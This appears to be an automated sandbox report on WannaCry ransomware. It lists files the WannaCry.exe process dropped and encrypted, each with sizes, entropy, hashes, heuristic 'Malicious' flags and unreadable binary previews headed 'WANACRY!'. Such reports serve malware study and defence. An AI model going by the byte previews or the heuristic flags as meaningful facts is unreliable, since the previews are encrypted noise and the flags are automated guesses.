                                                                              Preview:WANACRY!.......D$........vk'..{h..........|!M}^r.s...OV......?......f.....|01.k.e.........G7..^.q..e...@t.;.*.....P>..;..h6+MP....O.@.".H.8..1.(2...@=..../|.iM..u.N..b......l...up.l.D.p.<.....h.....T.b.oc.fi..o.z..j&^.Cc.E..{%..W.BY.w. ..0]5FHx....?.:.@.''............!.v..p>.U)\{q...U ;x....P...i....?..HSK.P..M..._M.Z.x.V......\|.....(.86k.p.3C1o._o.}.....)..A..K}ag|GV...ei....,P#.!.|.....o..03S.%....*6Z.Nt..O.0...".@....n.T.3.s...6, .84.6.D..|.oG.G...o..|.D...t....m..Y.....).~......s8..=.rJh....3.uc....2H...........K.."........R.%...G.m.q.1.gh[.."t.].p.>.n....b^.....\. .....Yx..d..}KU.R!.?A.?^....\...{nh..KRc..d.+N.....m.....#!2'..1.8..,.....cd..........l6....SM..=..m...].>.90...SN.........6`5...(x/"..M.W)....S}....?~.5..1D....;.b. t.,..A..T.W..[N.v..wc.u...&..!........x...t+.a$tf.v.a....D..u.(E...Q.C......Q..6..s~.j......px@..^/."...#.Iz.wF...32...j<.0h....K......I.<..v..ez...................[a..v2.`.EZ........u..o......H..{.%..|+B./.E..;..d.P.jt.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1256
                                                                              Entropy (8bit):7.835174879989443
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkP8L9oq2n3BaAGNLsUEFb8mK+HF801QI65HzFERnjTuqckm4Vz2uhY+KB:bkPbBwN/EV8m3HF3GbKRnuqckmWhY+0
                                                                              MD5:7F30F60D41040CAE19E671B5AEEB928E
                                                                              SHA1:B1F6F95CB606095E05793CAA4620AAF1D4671716
                                                                              SHA-256:6615E83044FFC6FCF324190442AAFBE32187850275DD1A81778AB1E813C83F0A
                                                                              SHA-512:7D26DC66A6E857AC579E5C0492D495FA5F3A596F69BD78BFCF5981F9EC71DA3CF57FFC6E47E7B0408BB31BF16F123D2718E91ED7966C08E26F45C45F9810F827
                                                                              Malicious:false
                                                                              Preview:WANACRY!....>9......R..t.!..(..<Z.1..7....wzjf....*..K_.,<>Q.5....x.......J.....G....e.HpF'G.I....Ox..:....7sQi.-.^..@>xR.dp......v..E.....gj.....d+..%.......k....nb......).6..x%..d....+]...../d....z...;......%6.>[....(ueCj..[.;...O.4..2U<..W.|I2.../.hQ..5....Q............Ek..x.}<.....5.g....)..m[u...._..g....#.g.m.G.Af...oL.X7g.;}%...%.N......`.....7OR.[....k.T[.,.JT..M..........N..M......Z?.4..F(..........8.V...-...\a._......l..`..sG_....+.{.)T...-....=k...s......(F7&P....h .]i.......R....i..l5..hi..(..X.pJe.n...6..,1..4...j_y..0.f.....E}.g....Z......j`l......q......M(.N..!p.TH......:y.of...O.BE..a.F.u.....D....#l...=..d.....d.c.8.5+.|.QM.p.E@].1'WS.T..g..71.s*..*>;.p...G.W*\s.......XrL7=.H.5.....g..z.~..e..%.PoRl8.[td.=...s.......M..E`)7.eO?CL]....uV+O...1..9=^O.K....~..JM{.g..sHV..j..im......W..-,.....-`4...X.....De.i2......."....:.^.)ga..UHr.l....n7'.}.......b|[M...6~....hO3.....u.N+...6..e...4.w...C.......KVK.._p....B.I.^....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1256
                                                                              Entropy (8bit):7.835174879989443
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkP8L9oq2n3BaAGNLsUEFb8mK+HF801QI65HzFERnjTuqckm4Vz2uhY+KB:bkPbBwN/EV8m3HF3GbKRnuqckmWhY+0
                                                                              MD5:7F30F60D41040CAE19E671B5AEEB928E
                                                                              SHA1:B1F6F95CB606095E05793CAA4620AAF1D4671716
                                                                              SHA-256:6615E83044FFC6FCF324190442AAFBE32187850275DD1A81778AB1E813C83F0A
                                                                              SHA-512:7D26DC66A6E857AC579E5C0492D495FA5F3A596F69BD78BFCF5981F9EC71DA3CF57FFC6E47E7B0408BB31BF16F123D2718E91ED7966C08E26F45C45F9810F827
                                                                              Malicious:false
                                                                              Preview:WANACRY!....>9......R..t.!..(..<Z.1..7....wzjf....*..K_.,<>Q.5....x.......J.....G....e.HpF'G.I....Ox..:....7sQi.-.^..@>xR.dp......v..E.....gj.....d+..%.......k....nb......).6..x%..d....+]...../d....z...;......%6.>[....(ueCj..[.;...O.4..2U<..W.|I2.../.hQ..5....Q............Ek..x.}<.....5.g....)..m[u...._..g....#.g.m.G.Af...oL.X7g.;}%...%.N......`.....7OR.[....k.T[.,.JT..M..........N..M......Z?.4..F(..........8.V...-...\a._......l..`..sG_....+.{.)T...-....=k...s......(F7&P....h .]i.......R....i..l5..hi..(..X.pJe.n...6..,1..4...j_y..0.f.....E}.g....Z......j`l......q......M(.N..!p.TH......:y.of...O.BE..a.F.u.....D....#l...=..d.....d.c.8.5+.|.QM.p.E@].1'WS.T..g..71.s*..*>;.p...G.W*\s.......XrL7=.H.5.....g..z.~..e..%.PoRl8.[td.=...s.......M..E`)7.eO?CL]....uV+O...1..9=^O.K....~..JM{.g..sHV..j..im......W..-,.....-`4...X.....De.i2......."....:.^.)ga..UHr.l....n7'.}.......b|[M...6~....hO3.....u.N+...6..e...4.w...C.......KVK.._p....B.I.^....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1624
                                                                              Entropy (8bit):7.877551769432488
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk4py0T8cfCLMZSld/K6rFsNKsmsrzpIwbqZe/nG:oE18oZSHfFHsrzjymnG
                                                                              MD5:50F001924F92D54D835AACB4ACAB2FC3
                                                                              SHA1:66648055DE02D4486784452301D19B8F6CD4CE96
                                                                              SHA-256:83E0284B4F632338482373C07FB2C9897167A3757318DBE51ECB85DA4F5674EA
                                                                              SHA-512:536510DAEFD8CFF4287D203F884698E7483098496D918D0F0DD6FEA60F9AEA3C51E8C0C64DF0C5D0C991718B7C09DA74D90D2468B102E3E964D4298873BB7089
                                                                              Malicious:false
                                                                              Preview:WANACRY!........i{.m.5.6..e...8.......V..U..H../p;..d..i.)..z.v..z............HE..u..[..i,.hw....3u...*B..D....T..n....B0....jm......{.{....t..DID......(..r.-..p@..OM8..o..P.kKm..K..>....<...?.`.#.s......Z@:.....n.x......Q..D....e;{..."v..m.U7.J.#hE.`v.......4.......y.0..T]....W..i..6.......U.Q=.N.r...L.{.....m..z"....v"m.{...<...g..T.:.....G."..$.+...y..4.d2?6@.B.-...F.....^MXD.!.N/|........b$tS%e8e.1......`.x...T.....R..?#Y.<.yN..H@.gJ....a.3..>.ydb....}<.-..+...e..L..#..H..j..^Z6`P..h.;.4E.T.s.......I..4.4P.z.;.F..!3...E5J..&eX.y......O.X .=.%.|.&..6.@.0...).P.f...hW....".Q....6.>...S......je....aK..qRm.P...$V..c. .5.=X.6....=_....."...l....D../.....r:....z?.....gO.I.|.o....W.......gN. :...7Z7r..df..4X.^...;.\.h...pH.2.I.~...A...*(..1.-..]..I+.......n.....3....*...W.^........W6...{.gT.....;e?......&.....u..i...M.*...|...De!bA.c.gf....G^.!........3.u.... a.3.z.....^?...5k*..^.z ..K.....d...%.#4..5.M=.... y.u)=V..6f.he..q....D1rt.yuOj
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1624
                                                                              Entropy (8bit):7.877551769432488
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk4py0T8cfCLMZSld/K6rFsNKsmsrzpIwbqZe/nG:oE18oZSHfFHsrzjymnG
                                                                              MD5:50F001924F92D54D835AACB4ACAB2FC3
                                                                              SHA1:66648055DE02D4486784452301D19B8F6CD4CE96
                                                                              SHA-256:83E0284B4F632338482373C07FB2C9897167A3757318DBE51ECB85DA4F5674EA
                                                                              SHA-512:536510DAEFD8CFF4287D203F884698E7483098496D918D0F0DD6FEA60F9AEA3C51E8C0C64DF0C5D0C991718B7C09DA74D90D2468B102E3E964D4298873BB7089
                                                                              Malicious:false
                                                                              Preview:WANACRY!........i{.m.5.6..e...8.......V..U..H../p;..d..i.)..z.v..z............HE..u..[..i,.hw....3u...*B..D....T..n....B0....jm......{.{....t..DID......(..r.-..p@..OM8..o..P.kKm..K..>....<...?.`.#.s......Z@:.....n.x......Q..D....e;{..."v..m.U7.J.#hE.`v.......4.......y.0..T]....W..i..6.......U.Q=.N.r...L.{.....m..z"....v"m.{...<...g..T.:.....G."..$.+...y..4.d2?6@.B.-...F.....^MXD.!.N/|........b$tS%e8e.1......`.x...T.....R..?#Y.<.yN..H@.gJ....a.3..>.ydb....}<.-..+...e..L..#..H..j..^Z6`P..h.;.4E.T.s.......I..4.4P.z.;.F..!3...E5J..&eX.y......O.X .=.%.|.&..6.@.0...).P.f...hW....".Q....6.>...S......je....aK..qRm.P...$V..c. .5.=X.6....=_....."...l....D../.....r:....z?.....gO.I.|.o....W.......gN. :...7Z7r..df..4X.^...;.\.h...pH.2.I.~...A...*(..1.-..]..I+.......n.....3....*...W.^........W6...{.gT.....;e?......&.....u..i...M.*...|...De!bA.c.gf....G^.!........3.u.... a.3.z.....^?...5k*..^.z ..K.....d...%.#4..5.M=.... y.u)=V..6f.he..q....D1rt.yuOj
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2424
                                                                              Entropy (8bit):7.929543465325879
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk0e0MXjjOffh35j2Q6Xnk6U1J0EpzD/4WzMN7m/J1KG4MiNAmTM9YUhVODm:o0e0MXjMZ5j2JXnkH0EJwWYN7O1KG4r6
                                                                              MD5:C1EE8BA3943D6F8F42AF1A64025A9B7E
                                                                              SHA1:DDD4619275AFD8CA951F853C5E2B0FDB2B28344F
                                                                              SHA-256:AE792CF4A64820AD7D77585603A0849D3653341538CBBF796AD48F022501792A
                                                                              SHA-512:5488C3B54C819A75DE9F18EEA0A60710471D9800B207EE376804429E24F19FDA208EAC0E910230923D57AAEFE492BE20FBF7779ADE253410027DF4E25DD215A8
                                                                              Malicious:false
                                                                              Preview:WANACRY!....R~.H53....q...K.e...g.'.m.J.....xd...8.e..1...$.t...M.....K....5U.)6S..#.E..>:w.....(..F..l......TP..b....."..U.-..2....RfC..tU.Ck.....e..v..o.(.!A...GI..........n.....j.#@_.ts..i)x."........-.)u..h..?..#U .j..G.....E....U.:tf......R;].j......$....^.......d/.w...'.iE..d...H/.f.,...k.0.:.I....)h.1..q..bS..gK.Rs.HVw.5.3.<.J.4..o]....u..i.z3....%..Psv....{......|..<..}.`...m...]..P.a..J.d(...X//W3..`..|9...x.g....n.YP....[.t.....0.Mw.f...puq..L..X>._.D.;../......{P.....R......=.yC......e`...8.I..$.!....R)I.....3..e+=..q....i&w,.. L`.4K..RS.6d...O...5l.m.....g./[.Q..O?..!..7O......g...3g....6tE.*..Yp...H......%.+...mu.g...fmiP......-s.P......B..BrXe^......_............|<R.d.._....<....-?K.J......U..U_5..-A.j-=Yb2%z_..9K..C...^...{..m....).!...E.."....c....U....pM..9?K.I...qh...7.......I..$....8].C.?o..M.x.E..j/.,......yie.Z..1..z..e..{p.kz#S...f)Fbt<..c.;.{.3.....H.8....*..mD.+Dgd.1F.ivY,.I.;,...Uq<.3...R5.u_B..Nr.......T..........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2424
                                                                              Entropy (8bit):7.929543465325879
                                                                              Encrypted:false
                                                                              SSDEEP:48:bk0e0MXjjOffh35j2Q6Xnk6U1J0EpzD/4WzMN7m/J1KG4MiNAmTM9YUhVODm:o0e0MXjMZ5j2JXnkH0EJwWYN7O1KG4r6
                                                                              MD5:C1EE8BA3943D6F8F42AF1A64025A9B7E
                                                                              SHA1:DDD4619275AFD8CA951F853C5E2B0FDB2B28344F
                                                                              SHA-256:AE792CF4A64820AD7D77585603A0849D3653341538CBBF796AD48F022501792A
                                                                              SHA-512:5488C3B54C819A75DE9F18EEA0A60710471D9800B207EE376804429E24F19FDA208EAC0E910230923D57AAEFE492BE20FBF7779ADE253410027DF4E25DD215A8
                                                                              Malicious:false
                                                                              Preview:WANACRY!....R~.H53....q...K.e...g.'.m.J.....xd...8.e..1...$.t...M.....K....5U.)6S..#.E..>:w.....(..F..l......TP..b....."..U.-..2....RfC..tU.Ck.....e..v..o.(.!A...GI..........n.....j.#@_.ts..i)x."........-.)u..h..?..#U .j..G.....E....U.:tf......R;].j......$....^.......d/.w...'.iE..d...H/.f.,...k.0.:.I....)h.1..q..bS..gK.Rs.HVw.5.3.<.J.4..o]....u..i.z3....%..Psv....{......|..<..}.`...m...]..P.a..J.d(...X//W3..`..|9...x.g....n.YP....[.t.....0.Mw.f...puq..L..X>._.D.;../......{P.....R......=.yC......e`...8.I..$.!....R)I.....3..e+=..q....i&w,.. L`.4K..RS.6d...O...5l.m.....g./[.Q..O?..!..7O......g...3g....6tE.*..Yp...H......%.+...mu.g...fmiP......-s.P......B..BrXe^......_............|<R.d.._....<....-?K.J......U..U_5..-A.j-=Yb2%z_..9K..C...^...{..m....).!...E.."....c....U....pM..9?K.I...qh...7.......I..$....8].C.?o..M.x.E..j/.,......yie.Z..1..z..e..{p.kz#S...f)Fbt<..c.;.{.3.....H.8....*..mD.+Dgd.1F.ivY,.I.;,...Uq<.3...R5.u_B..Nr.......T..........
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):28904
                                                                              Entropy (8bit):7.99318256793811
                                                                              Encrypted:true
                                                                              SSDEEP:768:5+sdIfDaj9gvRoehm54EK1ypWufGVEvv8u:UNRRoec4tUgufGCj
                                                                              MD5:D63D8A750C0EDDE089403C7A93F8DF20
                                                                              SHA1:2F487ED423C8B08655A0109968730709E3609FE5
                                                                              SHA-256:9CF58C1E6D0D31F590A750A87E86896379DB3975749129DC5F5763F6469304FD
                                                                              SHA-512:77D8A6C68275B4A3B7C359CCB53B216260506A0BA2CBE54E963D0805A562D56740E5BBDAF6601DFD244014AE56DB662905866EE908CB38F5FBE96171D5E2BBBF
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....4L.Z.$+y.m...^.{......\..p...9Jp.F;hi..~.}..+1L'O..Y.....6...{.a....e.\.t..&#..+^..X...9..'@a.4.=...Y.q...r"f....P.....O@9.<..7..m.:.K...$......Q.:.Y^(.....^...r.....o...."..<].S..(..S^q..2.G.r...].$..9....z...<..}....J..O...".e....K.....q*.....o.......(.Y...!IG3. ..N.1.rl!...b.a....I..+/..E...h..\..C.k.Z..s...k.w3...}p..E.v.M4:.b/..}.qC.X.L....b.2..U....q....b.j*.U^sh'X..Cj...6@..T..(& Eb...o. .qS..R..V.....S.O7vE...3....A&.a..".^.j.vk...P'.l.@.\.O..VR..G.q.....W...S..f.b...\..:........Q{..o..k.(m.Y.F....8.L...Kc).a9...G...lQ....{=0..1C.....6....c.8.w.....E.". .E..Y..67K...{...P++.1. J<.;`[ZI..;}.;..b.?.k..O..{z.G.....3....#..&.-...j.t....q..+'Y....q...D....O.E.GKv..r.?.%..+t....U".......i\....f'Z.u....^f...o....8.hdm.%.B.xg...e..%j0].KFWQ"..q.c....4...p..k~0.{{....v..........k=6.aX....(..[.$H.d. ..>.6..w..<.L....B..2..7C...V{N..%.".L...lBIu..t.%,.....D;wr.]...n...n....U-./..z.....m@Y.g.".8R..>...x;]......).......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):28904
                                                                              Entropy (8bit):7.99318256793811
                                                                              Encrypted:true
                                                                              SSDEEP:768:5+sdIfDaj9gvRoehm54EK1ypWufGVEvv8u:UNRRoec4tUgufGCj
                                                                              MD5:D63D8A750C0EDDE089403C7A93F8DF20
                                                                              SHA1:2F487ED423C8B08655A0109968730709E3609FE5
                                                                              SHA-256:9CF58C1E6D0D31F590A750A87E86896379DB3975749129DC5F5763F6469304FD
                                                                              SHA-512:77D8A6C68275B4A3B7C359CCB53B216260506A0BA2CBE54E963D0805A562D56740E5BBDAF6601DFD244014AE56DB662905866EE908CB38F5FBE96171D5E2BBBF
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....4L.Z.$+y.m...^.{......\..p...9Jp.F;hi..~.}..+1L'O..Y.....6...{.a....e.\.t..&#..+^..X...9..'@a.4.=...Y.q...r"f....P.....O@9.<..7..m.:.K...$......Q.:.Y^(.....^...r.....o...."..<].S..(..S^q..2.G.r...].$..9....z...<..}....J..O...".e....K.....q*.....o.......(.Y...!IG3. ..N.1.rl!...b.a....I..+/..E...h..\..C.k.Z..s...k.w3...}p..E.v.M4:.b/..}.qC.X.L....b.2..U....q....b.j*.U^sh'X..Cj...6@..T..(& Eb...o. .qS..R..V.....S.O7vE...3....A&.a..".^.j.vk...P'.l.@.\.O..VR..G.q.....W...S..f.b...\..:........Q{..o..k.(m.Y.F....8.L...Kc).a9...G...lQ....{=0..1C.....6....c.8.w.....E.". .E..Y..67K...{...P++.1. J<.;`[ZI..;}.;..b.?.k..O..{z.G.....3....#..&.-...j.t....q..+'Y....q...D....O.E.GKv..r.?.%..+t....U".......i\....f'Z.u....^f...o....8.hdm.%.B.xg...e..%j0].KFWQ"..q.c....4...p..k~0.{{....v..........k=6.aX....(..[.$H.d. ..>.6..w..<.L....B..2..7C...V{N..%.".L...lBIu..t.%,.....D;wr.]...n...n....U-./..z.....m@Y.g.".8R..>...x;]......).......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2920
                                                                              Entropy (8bit):7.932728101881443
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkgLjQXb9fFZssiwEodRYHKbfnjNFDNZzDxW8gahwOlRfJXdberW3gA5l3IK/+Hd:o4jQXb9fjBiwHdRYanJV/xWdw5lR1tdo
                                                                              MD5:152989939898CE8164B0C1CFFFA4DDB4
                                                                              SHA1:00FACB8009B144C54A9AEE044D527DFFEE3C08BE
                                                                              SHA-256:51755F8E16E7AB5B9AD35A30B69EA4EA1046AD8541071E4EA9BFE6DD82306025
                                                                              SHA-512:36F63D211FCCEE77B6D086FC48FA22EB41A50FA0C399F096B64ED4C8AADA015A74CB173D97A1B2CA56E0E180EC7AEC753C7F4C84A6A1886DAF73B1A38DBF40B1
                                                                              Malicious:false
                                                                              Preview:WANACRY!......IF*@.F=.~..cv....(Gci)..;T.|.2Z.......J&.q|W.~...!..zX..p....9bq...T.3..gLHU..l%+>...[.G]d...N.....=..8D.....Oc.4.......y...l...9C..............]HV!.....N&\c..*....A/l../;_...%T.a.t*.W.yM.@..3H_...p...!.mu).J/.q..V...Z..../fmJ.'*......yh{......F..........[.A...,>.j"...Q}..V*V/V`+]rX.I...H...t.*....A..3.....\.'.`=N$......!......a)..g.+.U...M..z..D1^..;hx..iLl.uHB.c.....5..EOu....(.R0...o.5+M29.....G1.!..Q.@at.GE..7..O..1i>7.V.....?6z.......Fm.2<=.:,..GV.]w..K.R....\..V...VX.._..*..'...M..S...0U....-3.W+.2:.B...2*..V..p...d.v..3`.YKQ.]...+(.[#....\w...)..P....s!...2F...'.jb..1..v+.G..>......<.)....3.q...\h........O.3.J?N[..x..\....H.G.6u..p..p......"L,?.:...Kt....\......H.U.......h..X..u$.dvn..X..)....ID....C*.Q.Yx....$.uytl..=..:7......u.X.....:.u...\..G.PQ.4:..Fm.7..#.......DB..p...&?X...,..U.s.nA....dt..m.Yr.k7........al..p.....]./...".X.......Y..}.....%..,.H...n;/..k.|..`.C.q.P...U..F..e.0.z.n....?].o/..~...3..R..C..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2920
                                                                              Entropy (8bit):7.932728101881443
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkgLjQXb9fFZssiwEodRYHKbfnjNFDNZzDxW8gahwOlRfJXdberW3gA5l3IK/+Hd:o4jQXb9fjBiwHdRYanJV/xWdw5lR1tdo
                                                                              MD5:152989939898CE8164B0C1CFFFA4DDB4
                                                                              SHA1:00FACB8009B144C54A9AEE044D527DFFEE3C08BE
                                                                              SHA-256:51755F8E16E7AB5B9AD35A30B69EA4EA1046AD8541071E4EA9BFE6DD82306025
                                                                              SHA-512:36F63D211FCCEE77B6D086FC48FA22EB41A50FA0C399F096B64ED4C8AADA015A74CB173D97A1B2CA56E0E180EC7AEC753C7F4C84A6A1886DAF73B1A38DBF40B1
                                                                              Malicious:false
                                                                              Preview:WANACRY!......IF*@.F=.~..cv....(Gci)..;T.|.2Z.......J&.q|W.~...!..zX..p....9bq...T.3..gLHU..l%+>...[.G]d...N.....=..8D.....Oc.4.......y...l...9C..............]HV!.....N&\c..*....A/l../;_...%T.a.t*.W.yM.@..3H_...p...!.mu).J/.q..V...Z..../fmJ.'*......yh{......F..........[.A...,>.j"...Q}..V*V/V`+]rX.I...H...t.*....A..3.....\.'.`=N$......!......a)..g.+.U...M..z..D1^..;hx..iLl.uHB.c.....5..EOu....(.R0...o.5+M29.....G1.!..Q.@at.GE..7..O..1i>7.V.....?6z.......Fm.2<=.:,..GV.]w..K.R....\..V...VX.._..*..'...M..S...0U....-3.W+.2:.B...2*..V..p...d.v..3`.YKQ.]...+(.[#....\w...)..P....s!...2F...'.jb..1..v+.G..>......<.)....3.q...\h........O.3.J?N[..x..\....H.G.6u..p..p......"L,?.:...Kt....\......H.U.......h..X..u$.dvn..X..)....ID....C*.Q.Yx....$.uytl..=..:7......u.X.....:.u...\..G.PQ.4:..Fm.7..#.......DB..p...&?X...,..U.s.nA....dt..m.Yr.k7........al..p.....]./...".X.......Y..}.....%..,.H...n;/..k.|..`.C.q.P...U..F..e.0.z.n....?].o/..~...3..R..C..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1441224
                                                                              Entropy (8bit):7.999882022389856
                                                                              Encrypted:true
                                                                              SSDEEP:24576:e7j1OM24ptZJxwuXmK+6DkNizecKB98aAZTolWK++XcW5nU4ROKNcfmMzLlfHBni:e7j1ftX0P9DBDAZElWcca3fNhMzLlfHs
                                                                              MD5:AB228D02519FC7DD9F52B91F7C3E70BD
                                                                              SHA1:000B6BFB64DADA37D71344D838F5F18200BF7309
                                                                              SHA-256:B530CE163BA80460E41E0D38907984966C261F43A02A3B844CF4CC08A5F3AA6B
                                                                              SHA-512:5D21D5FC7F8A877A581EA2BF309F1B1BC5597D147914F4CBAA805461F1316E2DAE611ACE1EF6746338F9CBE71C8FCB142B693B634ADB1AA12D2A04FA5B554174
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....+.+.B..).Jmv.U#..."v...{..y.B...a....`..G..%.,...%`.`.k$s.U.z.X............$./..e.ws&......p..CA...._..#~..x.....#...v..|&0.0..$Q+..g`ZgE...U.|.PYw.{...<....>..*f...4R...~..rO.....T..4.9..(y..>..v.4..j...F{w.3u..#......;.....9....w......pG.E...Y..............c..BQ"..=8..*.........&....Z.;n.......'4j..9.K..(.l.eP...Y{...$....n.{.......!W.o.........4L.K.T..K9.[.J.7VC.F..=.6.Qqe..m.a.\.$.b.;.l5...~.....pa......M.... .?. M....En.>...xz.....kEG.p.....A.VBq..%.QYa&..|.k....(39i.C.2z,b!XN..Cn1g;..~..C..+...7.$....P...\;...Z..0.X4..#.....p......R..o......7.k..<B.{}.Sn...........$.(./^=.;G.....Ad..U@.hd..H?.3.s.]M..bw.N.).U.:r.....j..B..a..r(<..1sl.d.E?.3.C L....t. D.H.2l...Q.P....j. o`.}G...r...;Z.A......M.....H.6.-!......A..B)..xL{.L...U....*;G.#e....Y........>.*.Q.......m......K#^.`I.xKg;.*.f..p...K..$>4..\..X..UO.g.u=.\._..Iu.?...w.9.h...M>x/......z2(....d..e..b....]..+!.......'...?.&2"....../`.swj.Ax.tQ.....,Y..]#.".w.}.&....z....u.8.'...r.b..P
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1441224
                                                                              Entropy (8bit):7.999882022389856
                                                                              Encrypted:true
                                                                              SSDEEP:24576:e7j1OM24ptZJxwuXmK+6DkNizecKB98aAZTolWK++XcW5nU4ROKNcfmMzLlfHBni:e7j1ftX0P9DBDAZElWcca3fNhMzLlfHs
                                                                              MD5:AB228D02519FC7DD9F52B91F7C3E70BD
                                                                              SHA1:000B6BFB64DADA37D71344D838F5F18200BF7309
                                                                              SHA-256:B530CE163BA80460E41E0D38907984966C261F43A02A3B844CF4CC08A5F3AA6B
                                                                              SHA-512:5D21D5FC7F8A877A581EA2BF309F1B1BC5597D147914F4CBAA805461F1316E2DAE611ACE1EF6746338F9CBE71C8FCB142B693B634ADB1AA12D2A04FA5B554174
                                                                              Malicious:true
                                                                              Preview:WANACRY!.....+.+.B..).Jmv.U#..."v...{..y.B...a....`..G..%.,...%`.`.k$s.U.z.X............$./..e.ws&......p..CA...._..#~..x.....#...v..|&0.0..$Q+..g`ZgE...U.|.PYw.{...<....>..*f...4R...~..rO.....T..4.9..(y..>..v.4..j...F{w.3u..#......;.....9....w......pG.E...Y..............c..BQ"..=8..*.........&....Z.;n.......'4j..9.K..(.l.eP...Y{...$....n.{.......!W.o.........4L.K.T..K9.[.J.7VC.F..=.6.Qqe..m.a.\.$.b.;.l5...~.....pa......M.... .?. M....En.>...xz.....kEG.p.....A.VBq..%.QYa&..|.k....(39i.C.2z,b!XN..Cn1g;..~..C..+...7.$....P...\;...Z..0.X4..#.....p......R..o......7.k..<B.{}.Sn...........$.(./^=.;G.....Ad..U@.hd..H?.3.s.]M..bw.N.).U.:r.....j..B..a..r(<..1sl.d.E?.3.C L....t. D.H.2l...Q.P....j. o`.}G...r...;Z.A......M.....H.6.-!......A..B)..xL{.L...U....*;G.#e....Y........>.*.Q.......m......K#^.`I.xKg;.*.f..p...K..$>4..\..X..UO.g.u=.\._..Iu.?...w.9.h...M>x/......z2(....d..e..b....]..+!.......'...?.&2"....../`.swj.Ax.tQ.....,Y..]#.".w.}.&....z....u.8.'...r.b..P
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2008
                                                                              Entropy (8bit):7.897933584698673
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkyJEyiyRcrt69u61+2U7lfoFpdvc4Tyrm++PcP38nS:oHjyK69u6o2U7ZoPieyKPcP8S
                                                                              MD5:05BF031A67D691C49E675170DA97069F
                                                                              SHA1:B1CBE4464E260861B1B7DC63B576496BDAD2C4E6
                                                                              SHA-256:8529A837D4A2F9D316E61FDF1150DACB5465D673C6D0EE4BF448D0DF4FF0CFE0
                                                                              SHA-512:AC79254B6F92FBC00DA5C670BE6540EA1574B9E9138ECC5F366F8430F289E5085EB1A2291E53573D878C1ED66C1AE90CDFD84D771DC5E485E03AC72C090BFDEE
                                                                              Malicious:false
                                                                              Preview:WANACRY!.......cV. ..`..y).H=:.....j...\...#kog. .1..-..0..A.'v.W[....)M..5..?.v....f........sl.FV.LL.o5qzN.+.+..k`L.z4...P.`.+.....Q.@[...7.V....{.l..-...0.).eg...*D.].........<......4YR.<...^..P.8*....e.7...............b.@.*...r...2. ...j::Q..qn....(...................V|.^TFiZ....\......_||Wy.....7.3.........}@X.B,...R@..+..w.,.g.j$Lx...L.3...T...H......y+.?...y..Q.!..A6.....8m..k.kbY[..4...h..Eh7..RjD..=t3L/......7G...J$K.d7P?>`.I......T1ww..s..h..w3....m ..9Bb.~...b.y......$.D..c.....m.._:0|.~...O+....{......[..?......-........*.O.......x.gP..Oy.........-.pY..8.c.H..d..3...}..X....FO..a.P.).!DD.P%`.}T.-/....w..........uH.ql;.#t}.D.....v..>.{..G..!]'...96..4.I.C...\.O.%..C.1n,.E.i..]p.+.&....W........3XP$.=:.uA....^....n..$....K^@....l....P......S....%L$.S.e(HC.H.....2..hE........jc...wgM"...6.....P....k.W60.....qo..\.^.,C..)...Rr]...2I......M....R\.X#b...'|9...T,d...<6AA.....6.c7......*.C.69.\G.. )NA.b'..3._jH.yW..-.=aZ4.......y.....?..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2008
                                                                              Entropy (8bit):7.897933584698673
                                                                              Encrypted:false
                                                                              SSDEEP:48:bkyJEyiyRcrt69u61+2U7lfoFpdvc4Tyrm++PcP38nS:oHjyK69u6o2U7ZoPieyKPcP8S
                                                                              MD5:05BF031A67D691C49E675170DA97069F
                                                                              SHA1:B1CBE4464E260861B1B7DC63B576496BDAD2C4E6
                                                                              SHA-256:8529A837D4A2F9D316E61FDF1150DACB5465D673C6D0EE4BF448D0DF4FF0CFE0
                                                                              SHA-512:AC79254B6F92FBC00DA5C670BE6540EA1574B9E9138ECC5F366F8430F289E5085EB1A2291E53573D878C1ED66C1AE90CDFD84D771DC5E485E03AC72C090BFDEE
                                                                              Malicious:false
